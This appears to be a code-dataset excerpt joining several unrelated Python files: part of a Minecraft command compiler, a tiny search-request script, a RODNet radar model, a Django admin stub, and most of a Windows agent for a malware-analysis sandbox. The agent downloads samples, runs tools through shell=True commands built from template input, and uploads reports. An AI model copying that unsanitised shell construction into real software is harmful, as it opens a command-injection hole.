def resolve(self, scope):
return 'block %s' % self.pos.resolve(scope)
class _UtilBlockPos(WorldPos):
def __init__(self, is_zero_tick):
self.block_pos = True
self.is_zero_tick = is_zero_tick
def resolve(self, scope):
if self.is_zero_tick:
return scope.get_zero_tick_block()
return scope.get_util_block()
UtilBlockPos = _UtilBlockPos(False)
ZeroTickBlockPos = _UtilBlockPos(True)
class DataGet(Command):
def __init__(self, target, path, scale=1):
assert isinstance(target, BlockOrEntityRef)
assert isinstance(scale, (int, float))
self.target = target
self.path = path
self.scale = int(scale) if scale == int(scale) else scale
def resolve(self, scope):
return 'data get %s %s %s' % (self.target.resolve(scope),
self.path.resolve(scope), self.scale)
class DataMerge(Command):
def __init__(self, ref, nbt):
assert isinstance(ref, BlockOrEntityRef)
self.ref = ref
self.nbt = nbt
def resolve(self, scope):
return 'data merge %s %s' % (self.ref.resolve(scope),
self.nbt.resolve(scope))
class DataModify(Command):
def __init__(self, ref, path, action, *rest):
assert isinstance(ref, BlockOrEntityRef)
self.ref = ref
self.path = path
self.action = action
self.init(*rest)
def resolve(self, scope):
return 'data modify %s %s %s' % (
self.ref.resolve(scope), self.path.resolve(scope), self.action)
class DataModifyValue(DataModify):
def init(self, val):
self.val = val
def resolve(self, scope):
return '%s value %s' % (super().resolve(scope), self.val.resolve(scope))
class DataModifyFrom(DataModify):
def init(self, ref, path):
assert isinstance(ref, BlockOrEntityRef)
self.fromref = ref
self.frompath = path
def resolve(self, scope):
return '%s from %s %s' % (super().resolve(scope),
self.fromref.resolve(scope), self.frompath.resolve(scope))
class DataModifyStack(DataModifyValue):
def __init__(self, index, key, action, value, path=StackPath):
super().__init__(GlobalEntity.ref, path(index, key), action,
value)
class DataRemove(Command):
def __init__(self, ref, path):
assert isinstance(ref, BlockOrEntityRef)
self.ref = ref
self.path = path
def resolve(self, scope):
return 'data remove %s %s' % (self.ref.resolve(scope),
self.path.resolve(scope))
class Function(Command):
def __init__(self, func_name):
self.name = func_name
def resolve(self, scope):
return 'function %s' % scope.function_name(self.name)
class Tellraw(Command):
def __init__(self, text, target):
assert isinstance(text, TextComponentHolder)
assert isinstance(target, EntityRef)
self.text = text
self.target = target
def resolve(self, scope):
return 'tellraw %s %s' % (self.target.resolve(scope),
self.text.resolve_str(scope))
class TextComponent(Resolvable):
pass
class TextComponentHolder(TextComponent):
def __init__(self, style, children):
self.style = style
self.children = children
def resolve_str(self, scope):
import json
return json.dumps(self.resolve(scope), separators=(',', ':'))
def resolve(self, scope):
text = {}
for key, value in self.style.items():
text[key] = self._resolve_style(key, value, scope)
extra = []
for child in self.children:
if isinstance(child, TextComponentHolder) and not child.style:
for child_child in child.children:
extra.append(child_child.resolve(scope))
else:
extra.append(child.resolve(scope))
if not self.style:
return extra
if extra:
if len(extra) == 1 and type(extra[0]) == dict:
text.update(extra[0])
else:
text['extra'] = extra
return text
def _resolve_style(self, key, value, scope):
if key == 'clickEvent':
assert isinstance(value, TextClickAction)
return value.resolve(scope)
return value
class TextStringComponent(TextComponent):
def __init__(self, stringval):
self.val = stringval
def resolve(self, scope):
return {'text': self.val}
class TextNBTComponent(TextComponent):
def __init__(self, entity, path):
assert isinstance(entity, EntityRef)
assert isinstance(path, Path)
self.entity = entity
self.path = path
def resolve(self, scope):
assert self.entity.is_single_entity(scope)
return {'nbt': self.path.resolve(scope),
'entity': self.entity.resolve(scope)}
class TextScoreComponent(TextComponent):
def __init__(self, ref):
assert isinstance(ref, ScoreRef)
self.ref = ref
def resolve(self, scope):
return {'score':
{'name': self.ref.target.resolve(scope),
'objective': self.ref.objective.resolve(scope)}}
class TextClickAction(Resolvable):
def __init__(self, action, value):
self.action = action
self.value = value
def resolve(self, scope):
if type(self.value) == str:
value = self.value
else:
assert self.action in ['run_command', 'suggest_command'] \
and isinstance(self.value, Command)
value = self.value.resolve(scope)
return {'action': self.action, 'value': value}
class Teleport(Command):
def __init__(self, target, *more):
assert isinstance(target, EntityRef)
self.args = [target]
self.args.extend(more)
def resolve(self, scope):
return 'tp %s' % ' '.join(a.resolve(scope) for a in self.args)
class Clone(Command):
def __init__(self, src0, src1, dest):
self.src0 = src0
self.src1 = src1
self.dest = dest
def resolve(self, scope):
return 'clone %s %s %s' % (self.src0.resolve(scope),
self.src1.resolve(scope),
self.dest.resolve(scope))
class Setblock(Command):
def __init__(self, pos, block):
assert isinstance(pos, WorldPos) and pos.block_pos
self.pos = pos
self.block = block
def resolve(self, scope):
return 'setblock %s %s' % (self.pos.resolve(scope),
self.block.resolve(scope))
class Scoreboard(Command):
allows_negative = False
def __init__(self, varref, value):
assert isinstance(varref, ScoreRef)
assert isinstance(value, int)
assert self.allows_negative or value >= 0
self.var = varref
self.value = value
def resolve(self, scope):
return 'scoreboard players %s %s %d' % (
self.op, self.var.resolve_pair(scope), self.value)
class SetConst(Scoreboard):
op = 'set'
allows_negative = True
class AddConst(Scoreboard):
op = 'add'
class RemConst(Scoreboard):
op = 'remove'
class GetValue(Command):
def __init__(self, scoreref):
assert isinstance(scoreref, ScoreRef)
self.ref = scoreref
def resolve(self, scope):
return 'scoreboard players get %s' % self.ref.resolve_pair(scope)
class Operation(Command):
def __init__(self, left, right):
assert isinstance(left, ScoreRef)
assert isinstance(right, ScoreRef)
self.left = left
self.right = right
def resolve(self, scope):
return 'scoreboard players operation %s %s %s' % (
self.left.resolve_pair(scope), self.op,
self.right.resolve_pair(scope))
class OpAssign(Operation): op = '='
class OpAdd(Operation): op = '+='
class OpSub(Operation): op = '-='
class OpMul(Operation): op = '*='
class OpDiv(Operation): op = '/='
class OpMod(Operation): op = '%='
class OpIfLt(Operation): op = '<'
class OpIfGt(Operation): op = '>'
class OpSwap(Operation): op = '><'
class SelectorArgs(Resolvable):
pass
class SimpleSelectorArgs(SelectorArgs):
def __init__(self, args):
self.args = args
def resolve(self, scope):
return dict(self.args)
class ScoreRange(Resolvable):
def __init__(self, min=None, max=None):
assert min is not None or max is not None
self.min = min
self.max = max
def resolve(self, scope):
range = ''
if self.min is not None:
range = '%d' % self.min
if self.max is not None and self.max != self.min:
range += '..%d' % self.max
elif self.max is None:
range += '..'
return range
class SelRange(SelectorArgs):
def __init__(self, objective, min=None, max=None):
assert isinstance(objective, ObjectiveRef)
self.objective = objective
self.range = ScoreRange(min, max)
def resolve(self, scope):
return {'scores': { self.objective.resolve(scope):
self.range.resolve(scope) }}
class SelEquals(SelRange):
def __init__(self, objective, value):
super().__init__(objective, value, value)
class ComboSelectorArgs(SelectorArgs):
@staticmethod
def new(first, second):
if first is None: return second
if second is None: return first
return ComboSelectorArgs(first, second)
def __init__(self, first, second):
self.first = first
self.second = second
def resolve(self, scope):
sel = {}
sel.update(self.first.resolve(scope))
sel.update(self.second.resolve(scope))
return sel
class SelNbt(SelectorArgs):
def __init__(self, path, value):
self.nbt_spec = {}
if not path:
self.nbt_spec = value
else:
self.build_selector(path, self.nbt_spec, value)
def build_selector(self, path, parent, value):
for i in range(len(path) - 1):
node = path[i]
if node.isdigit():
pos = int(node)
while len(parent) < pos + 1:
parent.append({})
parent = parent[pos]
continue
if node not in parent:
parent[node] = {}
if len(path) > i + 1:
if path[i+1].isdigit():
if not parent[node]:
parent[node] = []
else:
assert type(parent[node]) == list
parent = parent[node]
if path[-1].isdigit():
pos = int(path[-1])
while len(parent) < pos + 1:
parent.append({})
path[-1] = pos
parent[path[-1]] = value
def stringify_nbt(self, node, scope):
# TODO quoted keys
if type(node) == dict:
return '{%s}' % ','.join('%s:%s' % (k, self.stringify_nbt(v, scope))
for k,v in node.items())
if type(node) == list:
return '[%s]' % ','.join(map(lambda n:self.stringify_nbt(n, scope), node))
if isinstance(node, Resolvable):
return node.resolve(scope)
assert False, type(node)
def resolve(self, scope):
return {'nbt': self.stringify_nbt(self.nbt_spec, scope)}
class TeamName(Resolvable):
def __init__(self, name):
self.name = name
def resolve(self, scope):
return scope.team_name(self.name)
class TeamModify(Command):
def __init__(self, team, attr, value):
assert isinstance(team, TeamName)
self.team = team
assert attr in ['color', 'friendlyFire', 'seeFriendlyInvisibles',
'nametagVisibility', 'deathMessageVisibility',
'collisionRule', 'displayName', 'prefix', 'suffix']
self.attr = attr
self.value = value
def resolve(self, scope):
return 'team modify %s %s %s' % (self.team.resolve(scope), self.attr,
self.value)
class JoinTeam(Command):
def __init__(self, team, members):
assert isinstance(team, TeamName)
assert members is None or isinstance(members, EntityRef)
self.team = team
self.members = members
def resolve(self, scope):
members = (' ' + self.members.resolve(scope)) if self.members else ''
return 'team join %s%s' % (self.team.resolve(scope), members)
class Bossbar(Resolvable):
def __init__(self, name):
self.name = name
def resolve(self, scope):
return scope.bossbar(self.name)
class BossbarSet(Command):
def __init__(self, bar, prop, value):
assert isinstance(bar, Bossbar)
self.bar = bar
self.prop = prop
self.value = value
def resolve(self, scope):
value = (' ' + self.value.resolve(scope)) if self.value else ''
return 'bossbar set %s %s%s' % (self.bar.resolve(scope), self.prop,
value)
class Kill(Command):
def __init__(self, target):
assert isinstance(target, EntityRef)
self.target = target
def resolve(self, scope):
return 'kill %s' % self.target.resolve(scope)
class ReplaceItem(Command):
def __init__(self, ref, slot, item, amount=None):
assert isinstance(ref, BlockOrEntityRef)
self.ref = ref
self.slot = slot
self.item = item
self.amount = amount
def resolve(self, scope):
amount = (' %d' % self.amount) if self.amount is not None else ''
return 'replaceitem %s %s %s%s' % (self.ref.resolve(scope), self.slot,
self.item.resolve(scope), amount)
class GiveItem(Command):
def __init__(self, targets, item, count=1):
assert isinstance(targets, EntityRef)
self.targets = targets
self.item = item
self.count = count
def resolve(self, scope):
return 'give %s %s %d' % (self.targets.resolve(scope),
self.item.resolve(scope), self.count)
class ClearItem(Command):
def __init__(self, targets, item, max_count=-1):
assert isinstance(targets, EntityRef)
self.targets = targets
self.item = item
self.max_count = max_count
def resolve(self, scope):
return 'clear %s %s %d' % (self.targets.resolve(scope),
self.item.resolve(scope), self.max_count)
class EffectGive(Command):
def __init__(self, target, effect, seconds=None, amp=None, hide=None):
assert isinstance(target, EntityRef)
self.target = target
self.effect = effect
self.seconds = seconds if seconds is not None else 30
self.amp = amp if amp is not None else 0
self.hide = hide if hide is not None else False
def resolve(self, scope):
return 'effect give %s %s %d %d %s' % (self.target.resolve(scope),
self.effect, self.seconds, self.amp,
'true' if self.hide else 'false')
class Particle(Command):
def __init__(self, name, pos, delta, speed, count, mode, players):
self.name = name
self.pos = pos
self.delta = delta
self.speed = speed
self.count = count
self.mode = mode
self.players = players
def resolve(self, scope):
players = (' ' + self.players.resolve(scope)) if self.players else ''
return 'particle %s %s %s %f %d %s%s' % (self.name,
self.pos.resolve(scope), self.delta.resolve(scope),
self.speed, self.count, self.mode, players)
class Title(Command):
def __init__(self, target, action, *args):
assert isinstance(target, EntityRef)
self.target = target
self.action = action
self.args = args
def resolve(self, scope):
args = (' ' + SimpleResolve(*self.args).resolve(scope)) \
if self.args else ''
return 'title %s %s%s' % (self.target.resolve(scope), self.action, args)
class Summon(Command):
def __init__(self, entity_name, pos, data=None):
assert pos is None or isinstance(pos, WorldPos)
self.name = entity_name
self.pos = pos
self.data = data
def resolve(self, scope):
pos = (' ' + self.pos.resolve(scope)) if self.pos else \
(' ~ ~ ~' if self.data else '')
data = (' ' + self.data.resolve(scope)) if self.data else ''
return 'summon %s%s%s' % (self.name, pos, data)
class Advancement(Command):
def __init__(self, action, target, range, *args):
assert action in ['grant', 'revoke']
assert isinstance(target, EntityRef)
self.action = action
self.target = target
self.range = range
self.args = args
def resolve(self, scope):
args = (' ' + SimpleResolve(*self.args).resolve(scope)) \
if self.args else ''
return 'advancement %s %s %s%s' % (self.action,
self.target.resolve(scope),
self.range, args)
class AdvancementRef(Resolvable):
def __init__(self, name):
self.name = name
def resolve(self, scope):
return scope.advancement_name(self.name)
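
# Hedged usage sketch (not part of the original module): compose an /execute
# chain from the classes above. `scope` is assumed to be the session object
# the compiler normally supplies; only scope.objective() is exercised here.
def _example_execute_chain(scope):
    flag = ScoreRef(Selector('s'), ObjectiveRef('flag'))
    cmd = (ExecuteChain()
           .cond('if')
           .score_range(flag, ScoreRange(1))
           .run(Cmd('say hello')))
    # e.g. "execute if score @s <objective> matches 1.. run say hello"
    return cmd.resolve(scope)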
| 2.9375 | 3 |
top/clearlight/reptile/bilibili/bj_tech_mooc/example_04_360.py | ClearlightY/Python_learn | 1 | 11383 | import requests
keyword = "python"
try:
kv = {'q':keyword}
r = requests.get('http://www.so.com/s', params=kv)
print(r.request.url)
r.raise_for_status()
print(len(r.text))
except:
    print('爬取失败')  # "crawl failed"
rodnet/models/backbones/cdc_deep.py | zhengzangw/RODNet | 0 | 11384 | import torch.nn as nn
class RODEncode(nn.Module):
def __init__(self, in_channels=2):
super(RODEncode, self).__init__()
self.conv1a = nn.Conv3d(
in_channels=in_channels,
out_channels=64,
kernel_size=(9, 5, 5),
stride=(1, 1, 1),
padding=(4, 2, 2),
)
self.conv1a_1 = nn.Conv3d(
in_channels=64,
out_channels=64,
kernel_size=(9, 5, 5),
stride=(1, 1, 1),
padding=(4, 2, 2),
)
self.conv1a_2 = nn.Conv3d(
in_channels=64,
out_channels=64,
kernel_size=(9, 5, 5),
stride=(1, 1, 1),
padding=(4, 2, 2),
)
self.conv1b = nn.Conv3d(
in_channels=64,
out_channels=64,
kernel_size=(9, 5, 5),
stride=(2, 2, 2),
padding=(4, 2, 2),
)
self.conv2a = nn.Conv3d(
in_channels=64,
out_channels=128,
kernel_size=(9, 5, 5),
stride=(1, 1, 1),
padding=(4, 2, 2),
)
self.conv2b = nn.Conv3d(
in_channels=128,
out_channels=128,
kernel_size=(9, 5, 5),
stride=(2, 2, 2),
padding=(4, 2, 2),
)
self.conv3a = nn.Conv3d(
in_channels=128,
out_channels=256,
kernel_size=(9, 5, 5),
stride=(1, 1, 1),
padding=(4, 2, 2),
)
self.conv3b = nn.Conv3d(
in_channels=256,
out_channels=256,
kernel_size=(9, 5, 5),
stride=(1, 2, 2),
padding=(4, 2, 2),
)
self.bn1a = nn.BatchNorm3d(num_features=64)
self.bn1a_1 = nn.BatchNorm3d(num_features=64)
self.bn1a_2 = nn.BatchNorm3d(num_features=64)
self.bn1b = nn.BatchNorm3d(num_features=64)
self.bn2a = nn.BatchNorm3d(num_features=128)
self.bn2b = nn.BatchNorm3d(num_features=128)
self.bn3a = nn.BatchNorm3d(num_features=256)
self.bn3b = nn.BatchNorm3d(num_features=256)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(
self.bn1a(self.conv1a(x))
) # (B, 2, W, 128, 128) -> (B, 64, W, 128, 128)
# additional
x = self.relu(
self.bn1a_1(self.conv1a_1(x))
) # (B, 64, W, 128, 128) -> (B, 64, W, 128, 128)
x = self.relu(
self.bn1a_2(self.conv1a_2(x))
) # (B, 64, W, 128, 128) -> (B, 64, W, 128, 128)
x = self.relu(
self.bn1b(self.conv1b(x))
) # (B, 64, W, 128, 128) -> (B, 64, W/2, 64, 64)
x = self.relu(
self.bn2a(self.conv2a(x))
) # (B, 64, W/2, 64, 64) -> (B, 128, W/2, 64, 64)
x = self.relu(
self.bn2b(self.conv2b(x))
) # (B, 128, W/2, 64, 64) -> (B, 128, W/4, 32, 32)
x = self.relu(
self.bn3a(self.conv3a(x))
) # (B, 128, W/4, 32, 32) -> (B, 256, W/4, 32, 32)
x = self.relu(
self.bn3b(self.conv3b(x))
) # (B, 256, W/4, 32, 32) -> (B, 256, W/4, 16, 16)
return x
class RODDecode(nn.Module):
def __init__(self, n_class):
super(RODDecode, self).__init__()
self.convt1 = nn.ConvTranspose3d(
in_channels=256,
out_channels=128,
kernel_size=(4, 6, 6),
stride=(2, 2, 2),
padding=(1, 2, 2),
)
self.convt2 = nn.ConvTranspose3d(
in_channels=128,
out_channels=64,
kernel_size=(4, 6, 6),
stride=(2, 2, 2),
padding=(1, 2, 2),
)
self.convt3 = nn.ConvTranspose3d(
in_channels=64,
out_channels=n_class,
kernel_size=(3, 6, 6),
stride=(1, 2, 2),
padding=(1, 2, 2),
)
self.prelu = nn.PReLU()
self.sigmoid = nn.Sigmoid()
# self.upsample = nn.Upsample(size=(rodnet_configs['win_size'], radar_configs['ramap_rsize'],
# radar_configs['ramap_asize']), mode='nearest')
def forward(self, x):
x = self.prelu(self.convt1(x)) # (B, 256, W/4, 16, 16) -> (B, 128, W/2, 32, 32)
x = self.prelu(self.convt2(x)) # (B, 128, W/2, 32, 32) -> (B, 64, W, 64, 64)
x = self.convt3(x) # (B, 64, W, 64, 64) -> (B, 3, W, 128, 128)
return x
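
# Hedged shape-check sketch (not part of the original module): push a dummy
# radar cube through the encoder/decoder pair. Batch size, window length W=4
# and n_class=3 are arbitrary illustrative choices.
def _example_forward():
    import torch
    encoder = RODEncode(in_channels=2)
    decoder = RODDecode(n_class=3)
    dummy = torch.randn(1, 2, 4, 128, 128)  # (B, channels, W, range, azimuth)
    confmaps = decoder(encoder(dummy))
    return confmaps.shape  # expected: torch.Size([1, 3, 4, 128, 128])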
| 2.375 | 2 |
File/admin.py | alstn2468/Likelion_DRF_Project | 28 | 11385 | from django.contrib import admin
from .models import File
admin.site.register(File)
| 1.289063 | 1 |
agent/windows/agent.py | fortinet/ips-bph-framework | 21 | 11386 | <reponame>fortinet/ips-bph-framework
import shutil
import socket
import subprocess
import threading
import json
import pickle
import tempfile
import time
import box
import threading
import os
import base64
import getpass
import urllib
import requests
import zipfile
import sys
import pprint
import platform
DEBUG = True
BPH_TEMPLATE_SERVER_IP = sys.argv[1]
BPH_TEMPLATE_SERVER_PORT = int(sys.argv[2])
BPH_CONTROLLER_WEB_PORT = int(sys.argv[3])
running_os = platform.release()
if running_os == "7":
APP_DATA = "C:\\Users\\{current_user}\\AppData\\Roaming\\".format(
current_user=getpass.getuser())
TMP_FOLDER = "C:\\Users\\{current_user}\\AppData\\Local\\Temp\\".format(
current_user=getpass.getuser())
elif running_os == "XP":
# To avoid tool issues when dealing with white-spaced paths.
APP_DATA = "C:\\DOCUME~1\\{current_user}\\APPLIC~1\\".format(
current_user=getpass.getuser())
TMP_FOLDER = "C:\\DOCUME~1\\{current_user}\\LOCALS~1\\Temp\\".format(
current_user=getpass.getuser())
else:
print "Unsupported platform! Exiting..."
sys.exit()
class FilterSpecialVars():
def __init__(self, unfiltered_data, template=None, custom_user_vars=None):
# unfiltered_data should be a list
self.unfiltered_data = unfiltered_data
self.filtered_data = []
self.special_vars = {
'@appdata@': APP_DATA, # os.path.expandvars('%appdata%'),
'@temp@': TMP_FOLDER,
'@toolname@': template['tool_name'], # "peid"
'@filename@': template.tool.filename, # "peid.exe"
'@rid@': template['rid'],
'@md5@': template['md5'],
'@sample@': "\"" + ExecutionManager.sample_abs_path + "\"",
'@sample_filename@': "\"" + os.path.basename(ExecutionManager.sample_abs_path) + "\"",
'@tool_drive@': template['tool_drive'],
'@tool_path@': os.path.join(template['tool_drive'], template['remote_tool_path'].replace('/','\\')),
'@tool_abs_path@': os.path.join(template['tool_drive'], template['remote_tool_path'],
template.tool.filename),
'@report_folder@': os.path.join(APP_DATA, template['rid'], template['tool_name'])
}
if custom_user_vars != None:
self.custom_user_vars_filter(custom_user_vars)
def custom_user_vars_filter(self, custom_user_vars):
if DEBUG: print "Custom User Vars Filtering: {}".format(custom_user_vars)
for k, v in custom_user_vars.items():
key = "@{}@".format(k)
self.special_vars.update({key: v})
if DEBUG: print self.special_vars
def filter_now(self):
def do_filter(unfiltered_string):
for k, v in self.special_vars.items():
if k in str(unfiltered_string):
unfiltered_string = unfiltered_string.replace(k, v)
if DEBUG: print ">> Found: {}".format(unfiltered_string)
return unfiltered_string
for unfiltered_string in self.unfiltered_data:
if len(unfiltered_string) != 0:
if DEBUG: print "### Searching Variable ###: {}".format(unfiltered_string)
self.filtered_data.append(do_filter(unfiltered_string))
if DEBUG: print self.special_vars
if DEBUG:
print"FILTERED: {}".format(self.filtered_data)
# return " ".join(self.filtered_data)
class File(object):
def __init__(self):
pass
def generate_random_file_name(self):
import string
import random
return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(0, 10))
def zip_file(self, file_abs_path, seconds=5):
if not file_abs_path.endswith('.log') and not file_abs_path.endswith('.zip'):
if DEBUG: print "Creating compressed (zip) archive: {}".format(file_abs_path)
#time.sleep(5)
try:
zip_filename = "{}.zip".format(os.path.basename(file_abs_path))
if DEBUG: print zip_filename
original_filename = os.path.basename(file_abs_path)
if DEBUG: print original_filename
path_location = os.path.dirname(file_abs_path)
if DEBUG: print path_location
zip_file_abs_path = "{}\\{}".format(path_location, zip_filename)
if DEBUG: print zip_file_abs_path
zf = zipfile.ZipFile(zip_file_abs_path, 'w', zipfile.ZIP_DEFLATED)
                # When a file is being created as a compressed file (zip), the
                # configured delay is sometimes not enough and file-access errors
                # appear. To avoid that, several attempts are made until the
                # source file can be read.
try:
zf.write(file_abs_path, os.path.basename(file_abs_path))
except IOError:
if DEBUG: print "Target file is still in use... attempting in ({}) seconds".format(seconds)
time.sleep(seconds)
self.zip_file(file_abs_path)
else:
if DEBUG: print "Zip file creation - Done."
except OSError as e:
if DEBUG: print "Error when setting up info for target zip file: {}".format(e)
raise
else:
zipfile.ZIP_DEFLATED
if os.path.isfile(zip_file_abs_path):
if DEBUG: print "Zip file ok: {}".format(zip_file_abs_path)
# os.remove(file_abs_path)
return zip_filename
else:
if DEBUG: print "Zip file can't be created"
return None
class AutoItScript(File):
def __init__(self, automation_data):
self.autoit_script = None
self.__base64totmp(automation_data)
def __base64totmp(self, automation_data):
if DEBUG: print "Converting from base64 file data to Auto-it Script"
tmp_au_script_abs_path = os.path.join(
APP_DATA, self.generate_random_file_name())
with open(tmp_au_script_abs_path, 'w+') as tmp_au_script:
for _ in automation_data:
if DEBUG: print "Writing: {}\n".format(_)
tmp_au_script.write(_)
self.autoit_script = tmp_au_script_abs_path
class DownloadedFile(File):
def __init__(self, download_url):
self.download_dir = APP_DATA
self.fake_file_name = self.generate_random_file_name()
self.original_file_name = os.path.basename(download_url)
self.extension = os.path.splitext(download_url)[1].replace('.', '')
#self.abs_path = os.path.join(self.download_dir, "{}.{}".format(
# self.fake_file_name, self.extension))
self.abs_path = os.path.join(self.download_dir, self.original_file_name)
if DEBUG:
print self.abs_path
class ExecutionManager(object):
report_path = ""
sample_abs_path = ""
#### Agent Command Control ######
def execute_tool(self, **cmd_data):
if DEBUG:
print cmd_data
tool_drive = cmd_data['tool_drive']
tool_path = cmd_data['tool_path'].replace('/', '\\')
tool_name = cmd_data['tool_name']
tool_abs_path = "\"{tool_drive}{tool_path}\\{tool_name}\"".format(
tool_drive=tool_drive,
tool_path=tool_path,
tool_name=tool_name,
)
if DEBUG:
print tool_abs_path
tool_args = cmd_data['tool_args']
if DEBUG:
print tool_args
cmd = "{} {}".format(tool_abs_path, tool_args)
if DEBUG:
print cmd
print "\nExecuting Cmd: {}\n".format(cmd)
subprocess.call(cmd, shell=True)
def exec_manager(self, **cmd_data):
        if DEBUG: print "\nExecuting Thread with data: {}\n".format(cmd_data)
thread_name = cmd_data['tool_name']
thread = threading.Thread(target=self.execute_tool, name=thread_name, kwargs=cmd_data)
thread.start()
def write_tmp_file(self, datatowrite, sample_abs_path):
try:
if DEBUG: print "Writing Tmp file: {}".format(sample_abs_path)
with open(sample_abs_path, 'wb+') as f:
f.write(datatowrite)
except:
if DEBUG: print "Error while creating the tmp file."
else:
if DEBUG: print "Done."
if os.path.isfile(sample_abs_path):
if DEBUG: print "Temp file created correctly."
            # The destination folder is built this way because some tools show
            # weird behavior when passed certain arguments. For instance, CFF
            # Explorer does not work correctly when the file argument resides
            # in a directory with whitespace. The workaround is to use the DOS
            # (8.3) version of the path.
#fixed_sample_abs_path = sample_abs_path.split('\\')
#fixed_sample_abs_path[1] = "docume~1"
#fixed_sample_abs_path[3] = "applic~1"
# print fixed_sample_abs_path
# Setting up Class attribute for sample path
return sample_abs_path
return False
def download_file(self, download_url):
if DEBUG: print "Downloading: {}".format(download_url)
try:
import urllib2
filedata = urllib2.urlopen(download_url)
except urllib2.URLError:
if DEBUG: print "Can't download the target sample file. Make sure BPH Webserver is running on the host."
return False
else:
datatowrite = filedata.read()
sample_abs_path = DownloadedFile(download_url).abs_path
# Used when filtering custom variables
ExecutionManager.sample_abs_path = sample_abs_path
if DEBUG: print "Downloaded file: {}".format(sample_abs_path)
return self.write_tmp_file(datatowrite, sample_abs_path)
def execute_autoit_script(self, template, auto_it_script_abs_path):
# The previously generated AutoIT script will be executed.
if DEBUG: print "Executing Auto-It script"
self.exec_manager(
tool_drive=template.tool_drive,
tool_path='misc\\autoitv3\\',
tool_name='AutoIt3.exe',
tool_args=auto_it_script_abs_path)
def tool_execution(self, template):
def selected_execution(filtered_parameters, filtered_automation):
cascade_execution = False
if filtered_parameters is not None and filtered_automation is not None:
if DEBUG: print "Cascaded Execution Detected: parameters -> autoit"
cascade_execution = True
if filtered_parameters is not None:
if DEBUG: print "Parameter Execution Detected"
self.exec_manager(
tool_drive=template.tool_drive,
tool_path=template.remote_tool_path,
tool_name=template.tool.filename,
tool_args=filtered_parameters
)
if filtered_automation is not None:
                # If cascade execution is set, a delay between tool execution and
                # automation is also applied. This allows the tool to load fully
                # before the automation runs. A default of 5 seconds is used.
if cascade_execution:
if DEBUG: print "Cascade Execution Delay - Running now..."
time.sleep(5)
if DEBUG: print "Automation-Only Execution Detected"
custom_user_vars = template.configuration.execution.custom_user_vars
auto_it_script_abs_path = AutoItScript(filtered_automation).autoit_script
self.execute_autoit_script(template, auto_it_script_abs_path)
def filter_custom_vars(template, filter_type=None):
# Handling template parameters custom vars
if filter_type is not None:
custom_user_vars = template.configuration.execution.custom_user_vars
if filter_type == "parameters":
parameters = template.actions[template.actions.action]['parameters']
if parameters is not None:
if DEBUG: print "Parameters: {}".format(parameters)
if len(custom_user_vars) != 0:
if DEBUG: print "Custom Parameters Vars {} - Parameters({})".format(custom_user_vars, parameters)
filtered_parameters = self.filter_variables(
parameters, template, filter_type='parameters', custom_user_vars=custom_user_vars)
else:
filtered_parameters = self.filter_variables(
parameters, template, filter_type='parameters', custom_user_vars=None)
return filtered_parameters
if filter_type == "automation":
automation = template.actions[template.actions.action]['automation']
if automation is not None:
if DEBUG: print "Automation: {}".format(automation)
if len(custom_user_vars) != 0:
if DEBUG: print "Custom Automation Vars {}".format(custom_user_vars)
filtered_automation = self.filter_variables(
automation, template, filter_type='automation', custom_user_vars=custom_user_vars)
else:
filtered_automation = self.filter_variables(
automation, template, filter_type='automation', custom_user_vars=None)
return filtered_automation
action_name = template.actions.action
if DEBUG: print "Executing: {}".format(action_name)
filtered_parameters = filter_custom_vars(template, filter_type='parameters')
filtered_automation = filter_custom_vars(template, filter_type='automation')
selected_execution(filtered_parameters, filtered_automation)
class TemplateManager(ExecutionManager):
def __init__(self, template):
# self.report_directory_check(template.vm_report_name)
if DEBUG: print "#"*50
if DEBUG: print dict(template)
if DEBUG: print "#"*50
# Each tool request must save files. Those can be either a log file
# or output files from its execution. This "report path" folder will
# be created per request.
#
# The /files/ folder will be used to store any additional files generated
# by the tool.
self.report_path_files = os.path.join(
APP_DATA, template.rid, template.tool_name, 'files')
self.report_path = os.path.join(
APP_DATA, template.rid, template.tool_name)
if not os.path.isdir(self.report_path_files):
if DEBUG: print "Creating: {}".format(self.report_path_files)
os.makedirs(self.report_path_files)
if template.configuration.execution['download_sample']:
self.download_file(template.download_url)
# Tool execution will eventually select which execution type will be run,
        # either automated or manual (based only on parameters)
self.tool_execution(template)
# Delay (seconds) between tool executions.
exec_delay = template.configuration.execution.delay
if DEBUG: print "Execution Delay (in seconds): {}".format(exec_delay)
time.sleep(exec_delay)
while True:
if DEBUG: print threading.active_count()
if DEBUG: print threading.enumerate()
threads = str(threading.enumerate()).lower()
if template.configuration.execution.background_run:
if DEBUG: print "TOOL DOES RUN IN BACKGROUND..."
if template.tool.filename.lower() in threads:
                        # FIXED: this allows more than one tool to run in the background
if threading.active_count() != 1:
if "autoit" not in threads:
if DEBUG: print "TOOL RUN CHECK DONE"
break
else:
if DEBUG: print "TOOL DOES NOT RUN IN BACKGROUND..."
if template.tool.filename.lower() not in threads:
if "autoit" not in threads:
if DEBUG: print "TOOL RUN CHECK - DONE"
break
time.sleep(1)
if DEBUG: print "\n###### Tool execution has ended #######\n"
if DEBUG: print threading.active_count()
if DEBUG: print threading.enumerate()
if template.configuration.reporting.report_files:
if DEBUG: print "########## Starting COLLECTING HTTP FILES ##############"
self.report(template)
def filter_variables(self, data, template, filter_type=None, custom_user_vars=None):
if filter_type == "parameters":
# Convert into list here.
data = data.split(' ')
if filter_type == "automation":
# Decode first, then convert into a list.
data = base64.decodestring(data).split('\n')
if DEBUG: print "Filtering Variables: {}".format(data)
unfiltered_data = FilterSpecialVars(data, template=template, custom_user_vars=custom_user_vars)
unfiltered_data.filter_now()
if DEBUG: print "Filtered Args: ({})".format(unfiltered_data.filtered_data)
if filter_type == "parameters":
return " ".join(unfiltered_data.filtered_data)
if filter_type == "automation":
return unfiltered_data.filtered_data
def report_back(self, report_data):
url = "http://{}:{}/bph/report.php".format(BPH_TEMPLATE_SERVER_IP, BPH_CONTROLLER_WEB_PORT)
files = {'file': open(report_data['file_abs_path'], 'rb')}
response = requests.post(url, data={'project_name': report_data['project_name'],
'md5': report_data['md5'],
'sid': report_data['sid'],
'tool': report_data['tool_name'],
'rid': report_data['rid'],
'file': report_data['file'],
'dir': report_data['dir']}, files=files)
if DEBUG: print "Response: {}".format(response.text)
def report_files(self, base_folder, tool_name):
if DEBUG: print "Searching files in: {} - tool: {}".format(base_folder, tool_name)
while True:
if len(os.listdir(base_folder)) != 0:
if DEBUG: print "Files found.. Collecting them now..."
files_found = []
for root, dirs, files in os.walk(base_folder):
for file in files:
full_path = os.path.join(root, file)
